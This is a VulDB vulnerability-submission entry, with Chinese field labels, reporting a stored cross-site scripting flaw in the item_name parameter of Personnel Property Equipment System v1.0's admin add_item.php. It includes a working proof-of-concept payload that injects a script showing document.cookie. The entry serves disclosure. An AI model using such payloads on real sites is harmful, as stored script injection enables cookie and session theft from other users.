| 标题 | Personnel Property Equipment System v1.0 /PPES/admin/add_item.php POST parameter item_name exists stored cross-site scripting vulnerability |
|---|
| 描述 | Personnel Property Equipment System v1.0 has stored cross-site scripting.
Vulnerability File: /PPES/admin/add_item.php
POST parameter "item_name" exists stored cross-site scripting vulnerability.
Payload: item_name=<script>alert(document.cookie)</script>&item_brand=2&item_serial=3&item_status=New&item_description=<p>4</p>&save=
Payload will trigger when a user visits on http://localhost/PPES/admin/item.php |
|---|
| 来源 | ⚠️ https://github.com/LeozhangCA/CVEReport/blob/main/StoredXSS.md |
|---|
| 用户 | LeoZhangCA (UID 46757) |
|---|
| 提交 | 2023-05-13 13時30分 (3 年前) |
|---|
| 管理 | 2023-05-14 09時44分 (20 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 228972 [SourceCodester Personnel Property Equipment System 1.0 POST Parameter admin/add_item.php item_name 跨网站脚本] |
|---|
| 积分 | 20 |
|---|